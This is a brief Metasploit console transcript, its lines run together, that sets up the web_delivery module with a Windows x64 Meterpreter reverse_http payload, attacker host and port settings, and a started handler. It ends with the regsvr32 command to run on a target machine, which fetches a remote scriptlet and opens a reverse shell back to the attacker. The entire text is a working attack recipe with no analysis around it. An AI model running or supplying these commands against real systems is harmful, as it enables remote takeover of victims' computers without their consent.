msf> use exploit/multi/script/web_deliverymsf> set payload windows/x64/meterpreter/reverse_httpmsf> set srvhost $localipmsf> set srvport 8080msf> set lhost $localipmsf> set lport 6699msf> set target 3msf> run...[*] Started HTTP reverse handler on http://$localip:6699[*] Using URL: http://$localip:8080/2U0AjtJhBHgx[*] Server started.[*] Run the following command on the target machine:regsvr32 /s /n /u /i:http://$localip:8080/2U0AjtJhBHgx.sct scrobj.dll